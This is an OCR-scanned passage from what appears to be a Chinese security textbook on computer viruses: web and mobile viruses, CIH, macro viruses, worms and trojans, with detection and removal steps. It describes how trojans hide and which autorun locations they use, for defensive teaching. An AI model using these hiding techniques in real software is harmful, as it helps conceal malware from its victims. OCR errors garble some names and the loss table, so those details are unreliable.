比如 ， 用 户 可 以 将 一 个 小 游戏 与 病毒 通过 捆绑 器 程序 捆绑 ， 当 用 户 运 行 游戏 时 ， 病 毒 也 会 
同时 悄悄 地 运行 ， 给 用 户 的 计算 机 造成 危害 。 此 外 ， 目 前 一 些 图 片 文件 也 可 以 被 捆绑 病 
毒 ， 隐 项 性 更 强 。 
(4) 网 页 病毒 。 网 页 病毒 是 利用 网 页 中 的 恶意 代码 来 进行 破坏 的 病毒 。 它 存在 于 网 页 
之 中 ， 其 实 就 是 利用 一 些 Script 语言 (脚本 语言 ) 编 写 的 一 些 恶 意 代码 。 它 可 以 对 系统 的 一 
些 资源 进行 破坏 ， 轻 则 修改 用 户 的 注册 表 ， 使 用 户 的 首页 、 浏 览 器 标题 改变 ;， 重 则 可 以 关 
闭 系统 的 很 多 功能 ， 使 用 户 无 法 正常 使 用 计算 机 ， 更 有 甚 者 将 用 户 的 磁盘 进行 格式 化 。 这 
种 网 页 病毒 容易 编写 和 修改 ， 使 用 户 防不胜防 ， 最 好 的 方法 是 选用 有 网 页 监控 功能 的 杀毒 
软件 以 防 万 一 。 

(5) 手机 病毒 。 简 单 地 说 ， 手 机 病毒 就 是 以 手机 为 感染 对 象 ， 以 手机 网 络 和 计算 机 网 
络 为 平台 ， 通 过 病毒 短信 等 形式 对 手机 进行 攻击 ， 造 成 手机 异常 的 一 种 新 型 病毒 。 

随 着 智能 手机 的 出 现 ， 手 机 本 身 通过 网 络 可 以 完成 很 多 原本 由 计算 机 才能 完成 的 工 
作 ， 如 信息 处 理 、 收 发 E-mail 及 网 页 浏览 等 。 为 完成 这 些 工作 ， 手 机 除了 硬件 设备 以 外 
还 需要 上 层 软 件 的 支持 。 这 些 上 层 软件 一 般 是 用 Java、C++ 等 语言 开发 出 来 的 ， 是 嵌入 式 
操作 系统 ( 即 把 操作 系统 固化 在 芯片 中 )， 这 就 相当 于 一 部 小 型 计算 机 ， 因 此 ， 肯 定 会 有 受 
到 恶意 代码 攻击 的 可 能 。 而 目前 的 短信 并 不 只 是 简单 的 文本 内 容 ， 也 包括 手机 铃声 、 图 片 
等 信息 ， 都 需要 手机 操作 系统 “翻译 ”以 后 再 使 用 。 目 前 的 恶意 短信 就 是 利用 了 这 个 特 
点 ， 编 制 出 针对 某 种 手机 操作 系统 漏洞 的 短信 内 容 攻击 手机 。 如 果 编 制 者 的 水 平 足够 高 
对 手机 的 底层 操作 系统 足够 熟悉， 他 们 甚至 能 编制 出 毁 掉 手机 芯片 的 病毒 ， 使 手机 彻底 报 
废 。 因 此 ， 对 手机 病毒 的 危害 性 不 能 低估 。 
手机 病毒 其 实 也 和 计算 机 病毒 一 样 ， 可 以 通过 计算 机 执行 从 而 向 手机 乱 发 短信 息 。 严 
格 地 讲 ， 手 机 病毒 应 该 是 一 种 计算 机 病毒 ， 这 种 病毒 只 能 在 计算 机 网 络 中 进行 传播 而 不 能 
通过 手机 进行 传播 ， 因 此 手机 病毒 其 实 是 计算 机 病毒 程序 启动 了 电信 公司 的 一 项 服务 。 例 
如 ， 发 送 电 子 邮 件 到 手机 ， 而 且 它 发 给 手机 的 是 文档 ， 根 本 无 破坏 力 可 言 。 当 然 ， 有 的 手 
机 病毒 的 破坏 力 还 是 比较 大 的 ， 一 旦 发 作 可 能 比 个 人 计算 机 病毒 更 厉害 ， 其 传播 速度 甚至 
会 更 快 。 黑 客 如 果 对 手机 进行 攻击 ， 通 常 有 3 种 表现 方式 ， 一 是 攻击 WAP 服务 器 使 WAP 
手机 无 法 接收 正常 信息 ; 二 是 攻击 、 控 制 “ 网 关 ”， 向 手机 发 送 垃圾 信息 ; 三 是 直接 攻击 
手机 本 身 ， 使 手机 无 法 提供 服务 ， 这 种 破坏 方式 难度 相对 较 大 ， 目 前 的 技术 水 平 还 很 难 达 
到 。 为 防范 手机 病毒 ， 应 该 尽量 少 从 网 上 下 载 信息 ， 平 时 注意 短信 中 可 能 存在 的 病毒 ， 也 
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可 以 对 手机 进行 查 杀 病毒 。 


目前 应 对 手机 病毒 的 主要 技术 措施 有 两 种 : 一 是 通过 无 线 网 站 对 手机 进行 杀毒 ， 二 是 
通过 手机 的 IC 接 入 口 或 红外 传输 口 进行 杀毒 。 


8.1.6 计算 机 网 络 病毒 的 危害 


计算 机 网 络 病毒 的 具体 危害 主要 表现 在 以 下 几 个 方面 。 

(1) 病毒 发 作对 计算 机 数据 信息 的 直接 破坏 。 大 部 分 病毒 在 发 作 时 直接 破坏 计算 机 的 
重要 信息 数据 ， 所 利用 的 手段 有 格式 化 磁盘 、 改 写 文件 分 配 表 和 目录 区 、 删 除 重要 文件 或 
者 用 无 意义 的 “垃圾 ”数据 改写 文件 以 及 破坏 CMOS 设置 等 。 

(2) 占用 磁盘 空间 和 对 信息 的 破坏 。 寄 生 在 磁盘 上 的 病毒 总 要 非法 占用 一 部 分 磁盘 空 
间 。 引 导 型 病毒 是 由 病毒 本 身 占据 磁盘 引导 扇 区 ， 而 把 原来 的 引导 区 转移 到 其 他 扇 区 ， 被 
覆盖 的 肩 区 数据 永久 性 丢失 ， 无 法 恢复 。 文 件 型 病毒 利用 一 些 DOS 功能 进行 传染 ， 这 些 
DOS 功能 可 以 检测 出 磁盘 的 未 用 空间 ， 把 病毒 的 传染 部 分 写 到 磁盘 的 未 用 空间 去 ， 所 以 一 
般 不 破坏 磁盘 上 的 原 有 数据 ， 只 是 非法 侵占 了 磁盘 空间 。 一 些 文件 型 病毒 传染 速度 很 快 ， 
在 短 时 间 内 感染 大 量 文件 ， 每 个 文件 都 不 同 程度 地 加 长 了 ， 造 成 磁盘 空间 的 严重 浪费 。 


就 必然 会 抢占 一 部 分 系统 资源 。 病 毒 所 占用 的 内 存 长 度 大 致 与 病毒 本 身长 度 相 当 。 病 毒 抢 
占 内 存 ， 导 致 内 存 减少 ， 会 使 一 部 分 较 大 的 软件 不 能 运行 。 此 外 ， 病 毒 还 抢占 中 断 ， 计 算 
机 操作 系统 的 很 多 功能 是 通过 中 断 调用 技术 来 实现 的 ， 病 毒 为 了 传染 发 作 ， 总 是 修改 一 些 
有 关 的 中 断 地 址 ， 从 而 干扰 系统 的 正常 运行 。 网 络 病毒 会 占用 大 量 的 网 络 资源 ， 使 网 络 通 
信 变 得 极为 缓慢 ， 甚 至 无 法 使 用 。 

(4) 影响 计算 机 运行 速度 。 病 毒 进驻 内 存 后 不 但 干扰 系统 运行 ， 还 影响 计算 机 速度 ， 

主要 表现 在 ， 病 毒 为 了 判断 传染 发 作 条 件 ， 总 要 对 计算 机 的 工作 状态 进行 监视 ， 这 对 于 计 
算 机 的 正常 运行 既 多 余 又 有 害 。 有 些 病 毒 为 了 保护 自己 ， 不 但 对 磁盘 上 的 静态 病毒 加 密 ， 
而 且 进驻 内 存 后 的 动态 病毒 也 处 在 加 密 状 态 ，CPU 每 次 寻 址 到 病毒 处 都 要 运行 一 段 解密 程 
序 把 加 密 的 病毒 解密 成 合法 的 CPU 指令 再 执行 ， 而 病毒 运行 结束 时 再 用 一 段 程序 对 病毒 
重新 加 密 ， 这 样 CPU 要 额外 执行 数 干 条 甚至 上 万 条 指令 。 
(5) 计算 机 病毒 错误 与 不 可 预见 的 危害 。 计 算 机 病毒 与 其 他 计算 机 软件 的 区 别 是 病毒 
的 无 责任 性 。 编 制 一 个 完善 的 计算 机 软件 需要 耗费 大 量 的 人 力 、 物 力 ， 经 过 长 时 间 调 试 测 
试 。 而 病毒 都 是 个 别人 在 一 台 计 算 机 上 匆匆 编制 调试 后 就 向 外 抛 出 。 反 病毒 专家 在 分 析 大 
量 病毒 后 发 现 ， 绝 大 部 分 病毒 都 存在 不 同 程度 的 错误 。 

病毒 的 另 一 个 主要 来 源 是 变种 病毒 。 有 些 计 算 机 初学 者 尚 不 具备 独立 编制 软件 的 能 
力 ， 出 于 好 奇 修改 别人 的 病毒 ， 生 成 变种 病毒 ， 其 中 就 隐 含 着 很 多 错误 。 计 算 机 病毒 错误 
所 产生 的 后 果 往往 是 不 可 预见 的 ， 有 可 能 比 病毒 本 身 的 危害 还 要 大 。 

(6) 计算 机 病毒 给 用 户 造成 严重 的 心理 压力 。 据 有 关 计 算 机 销售 部 门 统计 ， 用 户 怀疑 
“计算 机 有 病毒 ”而 提出 咨询 约 占 售后 服务 工作 量 的 60% 以 上 。 经 检测 确实 存在 病毒 的 约 
占 70%， 另 有 30% 的 情况 只 是 用 户 怀疑 有 病毒 。 那 么 用 户 怀疑 有 病毒 的 理由 是 什么 呢 ? 多 
半 是 出 现 如 计算 机 死机 、 软 件 运行 异常 等 现象 。 这 些 现 象 确实 很 有 可 能 是 计算 机 病毒 造成 
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的 ， 但 又 不 全 是 。 实 际 上 在 计算 机 工作 异常 的 时 候 很 难 要 求 一 位 普通 用 户 去 准确 判断 是 否 
是 病毒 所 为 。 大 多 数 用 户 对 病毒 采取 宁可 信 其 有 的 态度 ， 这 对 于 保护 计算 机 安全 无 疑 是 十 
分 必要 的 ， 然 而 往往 要 付出 时 间 、 人 金钱 等 代价 。 另 外 ， 仅 仅 因为 怀疑 有 病毒 而 格式 化 磁盘 
所 带 来 的 损失 更 是 难以 弥补 。 

总 之 ， 计 算 机 病毒 像 幽 灵 一 样 笼罩 在 广大 计算 机 用 户 的 心头 ， 给 人 们 造成 巨大 的 心理 
压力 ， 极 大 地 影响 了 计算 机 的 使 用 效率 ， 由 此 带 来 的 无 形 损失 是 难以 估量 的 。 


8.2 ” 几 种 典型 病毒 的 分 析 


计算 机 病毒 有 几 万 种 ， 本 节 介绍 几 种 典型 的 计算 机 病毒 。 


8.2.1 CIH 病毒 


1. CIH 病毒 简介 


CIH 病毒 是 我 国 台湾 省 一 位 名 叫 陈 盘 豪 (CIH 是 其 名 字 的 缩写 ) 的 大 学 生 编 写 的 。 目 前 
传播 的 主要 途径 是 Internet 和 电子 邮件 。CIH 病毒 属于 文件 型 病毒 ， 主 要 感染 Windows 9x 
下 的 可 执行 文件 。CIH 病毒 使 用 了 面向 Windows 的 VxD 技术 ， 使 得 这 种 病毒 传播 的 实时 
性 和 隐蔽 性 都 特别 强 。 


2. CIH 病毒 的 破坏 性 


CIH 病毒 感染 Windows 可 执行 文件 ， 却 不 感染 Word 和 Excel 文档 ; 感染 Windows 9x 
系统 ， 却 不 感染 Windows NT 系统 。 

CIH 病毒 采取 一 种 特殊 的 方式 对 可 执行 文件 进行 感染 ， 感 染 后 的 文件 大 小 根本 没有 变 
化 ， 病 毒 代 码 的 大 小 在 1KB 左右 。 当 一 个 被 染 毒 的 EXE 文件 被 执行 时 ，CIH 病毒 驻 留 内 
存 ， 在 其 他 程序 被 访问 时 对 它们 进行 感染 。CIH 病毒 最 大 的 特点 就 是 对 计算 机 硬盘 以 及 
BIOS 具有 超 强 的 破坏 能 力 。 在 病毒 发 作 时 ， 病 毒 从 硬盘 主 引导 区 开始 依次 往 硬盘 中 写 入 
垃圾 数据 ， 直 到 硬盘 数据 全 被 破坏 为 止 。 因 此 ， 当 CIH 病毒 被 发 现时 ， 硬 盘 数 据 已 经 遭 到 
破坏 ， 当 用 户 想到 需要 采取 措施 之 时 ， 面 临 的 可 能 已 经 是 一 台 瘫 痪 的 计算 机 了 。 


3. 判断 是 否 感 染 CIH 病毒 的 方法 


有 两 种 简单 的 方法 可 以 判断 是 否 已 经 感染 上 了 CIH 病毒 。 

(1) 一 般 来 讲 ，CIH 病毒 只 感染 .EXE 可 执行 文件 ， 可 以 用 Ultra Edit 打开 一 个 常用 
的 .EXE 文件 (如 记事 本 NotePad.exe 或 写字 板 WordPad.exe)， 然 后 单 击 “ 切 换 十 六 进 制 模 式 
(也 ”按钮 ， 再 查找 “CIHvL ”， 如 果 发 现 “CIHvL2”“C1HvlL3” 或 “CIHvlL4” 等 字符 
串 ， 则 说 明 计算 机 已 经 感染 CIH 病毒 了 。 

(2) 感染 了 CIH v1.2 版 ， 则 所 有 WinZip 自 解压 文件 均 无 法 自动 解 开 ， 同 时 会 出 现 信 
息 “WinZip 自 解压 首部 中 断 。 可 能 原因 : 磁盘 或 文件 传输 错误 。” 感 染 了 CIH vl.3 版 ， 则 部 
分 WinZip 自 解压 文件 无 法 自动 解 开 。 如 果 遇 到 以 上 情况 ， 有 可 能 就 是 感染 上 CIH 病毒 了 。 
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4. 防范 CIH 病毒 的 方法 


(1) 应 了 解 CIH 病毒 的 发 作 时 间 ， 如 每 年 的 4 月 26 日 、6 月 26 日 及 每 月 26 日。 在 病 
毒 爆发 前 夕 ， 提 前 进行 查 毒 、 杀 毒 ， 同 时 将 系统 时 间 改 为 其 后 的 时 间 ， 如 27 日。 

(2) 杜绝 使 用 盗版 软件 ， 尽 量 使 用 正版 杀毒 软件 ， 并 在 更 新 系统 或 安装 新 的 软件 前 ， 
对 系统 或 新 软件 进行 一 次 全 面 的 病毒 检查 ， 做 到 防 患 于 未 然 。 

(3) 一 定 要 对 重要 文件 经 常 进行 备份 ， 万 一 计算 机 被 病毒 破坏 还 可 以 及 时 恢复 。 

5. 感染 CIH 病毒 的 处 理 方法 


首先 ， 注 意 保护 主板 的 BIOS。 应 了 解 自 己 计算 机 主板 的 BIOS 类 型 ， 如 果 是 不 可 升级 
的 ， 用 户 不 必 惊 慌 ， 因 为 CIH 病毒 对 这 种 BIOS 的 最 大 危害 ， 就 是 使 BIOS 返回 到 出 厂 时 
的 设置 ， 用 户 只 要 将 BIOS 重新 设置 即 可 。 如 果 BIOS 是 可 升级 的 ， 用 户 就 不 要 轻易 地 从 
C 盘 重 新 启动 计算 机 (否则 BIOS 就 会 被 破坏 )， 而 应 及 时 地 进入 BIOS 设置 程序 ， 将 系统 引 
导 盘 设置 为 A 盘 ， 然 后 用 Windows 的 系统 引导 软盘 启动 系统 到 DOS 7.0， 对 硬盘 进行 一 次 
全 面 查 毒 。 由 于 CIH 病毒 主要 感染 可 执行 文件 ， 不 感染 其 他 文件 ， 因 此 用 户 在 彻底 清除 硬 
盘 所 有 的 CIH 病毒 后 ， 应 该 重新 安装 系统 软件 和 应 用 软件 。 


8.2.2 ” 宏 病 毒 


1. 宏 病 毒 简介 


宏 病 毒 是 一 种 使 用 宏 编程 语言 编写 的 病毒 ， 主 要 寄生 于 Word 文档 或 模板 的 宏 中 。 一 
有 旦 打开 这 样 的 文档 ， 宏 病毒 就 会 被 激活 ， 进 入 计算 机 内 存 ， 并 驻 留 在 Normal 模板 上 。 从 
此 以 后 ， 所 有 自动 保存 的 文档 都 会 感染 上 宏 病 毒 ， 如 果 网 上 其 他 用 户 打 开 了 感染 病毒 的 文 
档 ， 宏 病毒 又 会 转移 到 他 的 计算 机 上 。 

宏 病 毒 通常 使 用 VB 脚本 ， 影 响 微软 的 Office 组 件 或 类 似 的 应 用 软件 ， 大 多 通过 邮件 
传播 。 最 有 名 的 例子 是 1999 年 的 美丽 杀手 病毒 (Melissa)， 通 过 Outlook 来 把 自己 放 在 电子 
邮件 的 附件 中 自动 寄 给 其 他 收 件 人 人 。 

2. 宏 病毒 的 预防 

防治 宏 病 毒 的 根本 在 于 限制 宏 的 执行 。 以 下 是 一 些 行 之 有 效 的 方法 。 

(1) 禁止 所 有 自动 宏 的 执行 。 在 打开 Word 文档 时 ， 按 住 Shift 键 ， 即 可 禁止 自动 宏 ， 
从 而 达到 防治 宏 病毒 的 目的 。 

(2) 检查 是 否 存 在 可 疑 的 宏 。 当 怀疑 系统 带 有 宏 病 毒 时 ， 首 先 应 检查 是 否 存在 可 疑 的 

， 特 别 是 一 些 奇怪 名 字 的 宏 ， 肯 定 是 病毒 无 疑 ， 将 它 删 除 即 可 。 即 使 删除 错 了 ， 也 不 会 对 
~ 文档 内 容 产 生 任何 影响 ， 仅 仅 是 少 了 相应 的 “ 宏 功 能 ”而 已 。 具 体 做 法 是 ， 选 择 “ 工 
有 具 ”菜单 中 的 “ 宏 ” 命 令 ， 打开“ 宏 ” 对 话 框 ， 选 择 要 删除 的 宏 ， 单 击 “ 删 除 ” 按 钮 即 可 。 

(3) 按照 自己 的 习惯 设置 。 针 对 宏 病 毒 感染 Normal.dot 模板 的 特点 ， 可 重新 安装 Word 
后 建立 一 个 新 文档 ， 将 Word 的 工作 环境 按照 自己 的 使 用 习惯 进行 设置 ， 并 将 需要 使 用 的 
宏一 次 编制 好 ， 做 完 后 保存 新 文档 。 这 时 生成 的 Normal.dot 模板 绝对 没有 宏 病 毒 ， 可 将 其 备 
份 。 在 遇 到 有 宏 病 毒 感染 时 ， 用 备份 的 Normal.dot 模板 覆盖 当前 的 模板 ， 可 以 消除 宏 病毒 。 
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(4) 使 用 Windows 自 带 的 写字 板 。 在 使 用 可 能 有 宏 病毒 的 Word 文档 时 ， 先 
Windows 0 将 其 转换 为 写字 板 格式 的 文件 保存 后 ， 再 用 Word 调 
用 。 因 为 写字 板 不 调用 、 不 保存 任何 宏 ， 文 档 经 过 这 样 的 转换 ， 所 有 附带 的 宏 ( 包 括 宏 病 毒 ) 
都 将 丢失 ， 这 条 & ei 有 用 。 

(5) 提示 保存 Normal 模板 。 大 部 分 Word 用 户 仅 使 用 普通 的 文字 处 理 功 能 ， 很 少 使 
宏 编 程 ， 对 Normal.dot 模板 很 少 去 进行 修改 。 因 此 ， 可 以 选择 “工具 ”菜单 中 的 “选项 ” 
命令 ， 打 开 “ 保 存 ” 选 项 卡 ， 选 中 “提示 保存 Normal 模板 ” 复 选 框 。 一 旦 宏 病 毒 感染 了 
Word 文档 ， 退 出 Word 时 ，Word 就 会 出 现 “更 改 的 内 容 会 影响 到 公用 模板 Normal， 是 否 
保存 这 些 修改 内 容 ? ”的 提示 信息 ， 此 时 应 单 击 “ 否 ”按钮 ， 退 出 后 进行 杀毒 。 

(6) 使 用 rtf 和 .csv 格式 代替 .doc 和 .xls。 要 想 应 付 宏 所 产生 的 问题 ， 可 以 使 用 .rtf 格式 
的 文档 来 代替 .doc 格式 ， 用 .csv 格式 的 电子 表格 来 代替 .xls 格式 ， 因 为 这 些 格式 不 支持 宏 
功能 。 在 与 其 他 人 交换 文件 时 ， 使 用 rtf 和 .csv 格式 的 文件 最 安全 。 


3. 宏 病毒 的 清除 

(1) 手工 清除 。 

【 例 8.1】 以 Word 为 例 ， 介 绍 宏 病毒 的 清除 操作 。 
小 操作 步 取 


“六 选取 “工具 ”菜单 中 “ 宏 ” 命 令 ， 打 开 “ 宏 ”对 话 框 ， 如 图 8.1 所 示 。 


单 步 执行 @) 
编辑 E) 


创建 CC) 
删除 @) 
管理 器 (@)... 


宏 的 位 置 &) | 所 有 的 活动 模板 和 文档 
说 明 民 ): 
宏 在 2006-10-7 由 a 录制 


取消 


图 8.1 “ 宏 ” 对 话 框 


@ 单 击 “ 管 理 器 ”按钮 ， 打开“ 管理 器 ”对 话 框 ， 选 择 “ 宏 方案 项 ”选项 卡 ， 在 
“ 宏 方案 项 的 有 效 范围 ”下 拉 列 表 框 中 选择 要 检查 的 文档 。 这 时 在 上 面 的 列表 框 中 就 会 出 
现 该 文档 模板 中 所 含 的 宏 ， 可 以 将 不 明 来 源 的 宏 删除 ， 如 图 8.2 所 示 。 
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样式 @) ‖ 自动 图 文集 @&) ‖ 工具 栏 If) | 宏 方 案 项 加 ) 
在 Normal. dot 中 加 ): 到 Nornal. dot @): 
[ewhacr os | [MO Jewllacros 


删除 0) 


宏 方 案 项 的 有 效 范围 O: 宏 太 案 天 的 有 效 范围 四 ): 


[REGES Wormal dot [共用 模板 ) 


关闭 文件 狂 ) 关闭 文件 于 ) 


图 8.2 “管理 器 ”对 话 框 


退出 Word， 然 后 先 到 C 盘 根 目 录 下 查看 有 没有 Autoexec.dot 文件 ， 如 果 有 这 个 文件 


则 删除 它 。 


找到 Normal.dot 文件 ， 然 后 删除 它 。Word 会 自动 重新 生成 一 个 干净 的 Normal.dot 


半生 


到 目录 C:\Program Files\Microsoft Office\Office\Startup 下 查看 有 没有 模板 文件 ， 如 果 有 
而 且 不 是 用 户 自己 建立 的 ， 则 删除 它 。 
重新 启动 Word， 这 时 Word 已 经 恢复 正常 了 。 


(2) 使 用 专业 杀毒 软件 。 目 前 的 杀毒 软件 (如 瑞星 等 ) 都 具备 清除 宏 病 毒 的 能 力 。 当 然 也 
只 能 对 已 知 的 宏 病毒 进行 检查 和 清除 ， 对 于 新 出 现 的 病毒 或 病毒 的 变种 则 可 能 不 能 正常 地 
清除 ， 或 者 将 会 破坏 文件 的 完整 性 ， 此 时 还 需要 手工 清理 。 

8.2.3 ”蠕虫 病毒 
1. 蠕虫 病毒 的 定义 


蠕虫 (Worm) 是 一 种 通过 网 络 传播 的 恶性 病毒 ， 通 过 分 布 式 网 络 来 扩散 传播 特定 的 信息 
或 错误 ， 进 而 造成 网 络 服务 遭 到 拒绝 并 发 生死 锁 。 蠕 虫 是 一 种 广义 的 计算 机 病毒 。 但 蠕虫 
又 与 传统 的 病毒 有 许多 不 同 之 处 ， 如 不 利用 文件 寄生 、 导 致 网 络 拒绝 服务 、 与 黑客 技术 相 
结合 等 。 在 产生 的 破坏 性 上 ， 蠕 虫 病毒 也 不 是 普通 病毒 所 能 比拟 的 ， 它 和 普通 病毒 的 主要 


区 别 如 表 8.1 所 示 。 
表 8.1 普通 病毒 与 蠕虫 病毒 的 比较 
病毒 类 型 普通 病毒 蠕虫 病毒 
存在 形式 寄生 于 实 件 独立 程序 
传染 机 制 宿主 程序 运行 主动 攻击 
传染 目标 本 地 文件 网 络 计算 机 
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自从 1988 年 美国 人 Robert Morris 从 实验 室 放 出 第 一 个 蠕虫 病毒 以 来 ， 计 算 机 蠕虫 病 
毒 以 其 快速 、 多 样 化 的 传播 方式 不 断 给 网 络 世界 带 来 灾害 。 特 别 是 1999 年 以 来 ， 高 危 里 
虫 病毒 的 不 断 出 现 ， 使 世界 经 济 蒙受 了 轻 则 几 十 亿美 元 ， 重 则 几 百 亿美 元 的 巨大 损失 ， 如 


表 8.2 所 示 。 
表 8.2 ”蠕虫 千 成 的 损失 
病毒 名 称 造成 损失 
莫 里 斯 娇 虫 6000 多 台 计算 机 停机 ， 经 济 损失 达 9600 万 美元 
电 政府 部 门 和 一 些 大 公司 紧急 关闭 了 网 络 服务 器 ， 经 济 损失 超 
美丽 杀手 1999 年 > 
过 12 亿美 元 
爱 由 病毒 众多 用 户 计算 机 被 感染 ， 损 失 超过 96 亿美 元 
红色 代码 网 络 瘫痪 ， 直 接 经 济 损失 超过 26 亿美 元 
求职 信 大 量 病毒 邮件 堵塞 服务 器 ， 损 失 达 数 百 亿美 元 
本 国 网 络 大 面积 痪 ， 银 行 自动 提 款 机 运作 中 断 ， 直 接 经 济 损失 
超过 26 亿美 元 
冲击 波 大 量 网 络 竣 痪 ， 造 成 数 十 亿美 元 的 损失 
ee 大 量 的 垃圾 邮件 攻击 SCO 和 微软 网 站 ， 给 全 球 经 济 造成 了 
300 多 亿美 元 的 损失 


据 调查 ，2004 年 破坏 性 最 大 的 十 大 病毒 分 别 是 网 络 天 空 (Worm.Netsky)、 爱 情 后 门 
(Worm.Lovgate) 、 SCO 炸 弹 (WormNovarg) 、 小 邮 差 (Wom.MimaiD 、 垃 圾 桶 
(Worm.Lentin.m)、 恶 应 (Worm.Bbeagle)、 求 职 信 (Worm.Klez)、 高 波 (Worm.Agobot.3)、 震 
荡 波 (Worm.SassenD 和 瑞 波 (BackdoorRbob 等 。 从 病毒 名 字 就 可 以 看 出 ， 几 乎 全 部 是 蠕虫 病 
毒 ， 可 见 蠕虫 病毒 已 经 成 了 目前 危害 网 络 安全 的 最 严重 问题 。 


2. 蠕虫 病毒 的 基本 结构 和 传播 过 程 


(1) 蠕虫 的 基本 程序 结构 包括 以 下 3 个 模块 。 

@ 传播 模块 。 负 责 蠕 虫 的 传播 ， 传 播 模块 又 可 以 分 为 3 个 基本 模块 ， 即 扫描 模块 、 
攻击 模块 和 复制 模块 。 

@ 隐藏 模块 。 侵 入 主机 后 ， 隐 藏 蠕虫 程序 ， 防 止 被 用 户 发 现 。 

@ 目的 功能 模块 。 实 现 对 计算 机 的 控制 、 监 视 或 破坏 等 功能 。 

(2) 蠕虫 程序 的 一 般 传播 过 程 。 

@ 扫描 。 由 蠕虫 的 扫描 模块 负责 探测 存在 漏洞 的 主机 。 当 程序 向 某 个 主机 发 送 探测 
漏洞 的 信息 并 收 到 成 功 的 反馈 信息 后 ， 就 得 到 一 个 可 传播 的 对 象 。 

@ 攻击 。 攻 击 模块 按 漏 洞 攻 击 步骤 自动 攻击 上 一 步骤 中 找到 的 对 象 ， 取 得 该 主机 的 
权限 (一 般 为 管理 员 权限 )， 获 得 一 个 Shell。 

@ 复制 。 复 制 模块 通过 原 主机 和 新 主机 的 交互 将 蠕虫 程序 复制 到 新 主机 并 启动 。 

可 见 ， 传 播 模块 实现 的 实际 上 是 自动 入 侵 的 功能 ， 所 以 蠕虫 的 传播 技术 是 蠕虫 技术 的 
核心 。 
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爱情 后 门 (Worm.Lovgate) 是 一 种 危害 性 很 强 的 蠕虫 病毒 ， 其 发 作 时 间 是 随机 的 ， 主 要 
通过 网 络 和 邮件 来 传播 ， 感 染 对 象 为 硬盘 文件 夹 。 


8.2.4 ”木马 病毒 


1. 木马 病毒 定义 

木马 全 称 为 特洛伊 木马 (Trojan Horse， 英 文 简称 为 Trojan)， 在 计算 机 安全 学 中 ， 特 洛 
伊 木 马 是 指 一 种 计算 机 程序 ， 表 面 上 或 实际 上 有 某 种 有 用 的 功能 ， 而 含有 隐藏 的 可 以 控制 
用 户 计算 机 系统 、 危 害 系统 安全 的 功能 ， 可 能 造成 用 户 资料 的 泄露 、 破 坏 或 整个 系统 的 崩 
省 。 在 一 定 程度 上 ， 木 马 也 可 以 称 为 是 计算 机 病毒 。 


2. 木马 病毒 的 工作 原理 


在 Windows 系统 中 ， 木 马 一 般 作为 一 个 网 络 服 务 程序 在 感染 了 木马 的 计算 机 后 台 运 
行 ， 监 听 本 机 一 些 特定 端口 ， 这 个 端口 号 多 数 比较 大 (在 5000 以 上 ， 但 也 有 部 分 是 5000 以 
下 的 )。 当 该 木马 相应 的 客户 端 程序 在 此 端口 上 请 求 连接 时 ， 它 会 与 客户 程序 建立 一 TCP 
连接 ， 从 而 被 客户 端 远程 控制 。 

木马 一 般 不 会 让 人 看 出 破绽 ， 对 于 木马 程序 设计 人 员 来 说 ， 要 隐藏 自己 所 设计 的 窗口 
程序 ， 主 要 途径 有 在 任务 栏 中 将 窗口 隐藏 ， 这 个 只 要 把 Form( 窗 体 ) 的 Visible 属性 调整 为 
False，ShowInTaskBar 属性 也 设 为 False 即 可 。 那 么 程序 运行 时 就 不 会 出 现在 任务 栏 中 
了 。 如 果 要 在 任务 管理 器 中 隐身 ， 只 要 将 程序 调整 为 系统 服务 程序 就 可 以 了 。 

木马 是 在 计算 机 刚 开 机 时 运行 ， 进 而 常 驻 内 存 。 其 大 都 采用 了 Windows 系统 启动 时 自 
动 加 载 应 用 程序 的 方法 ， 包 括 win.ini、system_.ini 和 注册 表 等 。 

在 win.ini 文件 中 ，[WINDOWS] 下 面 ，“run=” 和 “load=” 行 是 Windows 启动 时 要 
自动 加 载运 行 的 程序 项 目 ， 木 马 可 能 会 在 这 现 出 原形 。 一 般 情况 下 ， 它 们 的 等 号 后 面 什么 
都 没有 ， 如 果 发 现 后 面 跟 有 路 径 与 文件 名 ， 而 且 不 是 你 熟悉 的 或 以 前 没有 见 到 过 的 启动 文 
件 项 目 ， 那 么 你 的 计算 机 就 可 能 中 木马 病毒 了 。 当 然 也 得 看 清楚 ， 因 为 许多 木马 还 通过 其 
容易 混淆 的 文件 名 来 轴 开 用户。 例如，AOL Trojan， 它 把 自身 伪装 成 command.exe 文件 ， 
如 果 不 注意 可 能 不 会 发 现 它 ， 而 误 认 它 为 正常 的 系统 启动 文件 项 。 

在 system.ini 文件 中 ，[BOOT] 下 面 有 个 “shell=Explorer.exe” 项 。 如 果 等 号 后 面 不 仅 
仅 是 explorer.exe， 而 是 “shell=Explorer.exe 程序 名 ”， 那 么 后 面 跟着 的 那个 程序 就 是 木 
马 程序 ， 说 明 该 计算 机 中 了 木马 。 

隐蔽 性 强 的 木马 都 在 注册 表 中 做 文章 ， 因 为 注册 表 本 身 就 非常 庞大 、 众 多 的 启动 项 目 
极 易手 人 耳目 。 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 

HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 


HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOonce 


上 面 这 些 主键 下 面 的 启动 项 目 都 可 以 成 为 木马 的 容 身 之 处 。 如 果 是 Windows NT， 还 
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得 注意 HKEY-LOCAL-MACHINE\Software\SAM 下 的 内 容 ， 通 过 regedit 等 注册 表 编 辑 工 
具 查 看 SAM 主键 ， 里 面 应 该 是 空 的 。 

木马 驻 留 计算 机 内 存 以 后 ， 还 要 有 客户 端 程序 来 控制 才 可 以 进行 相应 的 “黑箱 ” 操 
作 。 客 户 端 要 与 木马 服务 器 端 进行 通信 就 必须 建立 连接 (一 般 为 TCP 连接 )， 通 过 相应 的 程 
序 或 工具 都 可 以 检测 到 这 些 非 法 网 络 连接 的 存在 。 

3. 木马 病毒 的 检测 


首先 ， 查 看 system.ini、win.ini、 启 动 组 中 的 启动 项 目 。 选 择 “ 开 始 ” 一 “运行 ” 菜 间 
命令 ， 在 打开 的 “运行 ”对 话 框 输入 msconfig， 运 行 Windows 自 带 的 “系统 配置 实用 程序 ”。 

1) 查看 system.ini 文件 

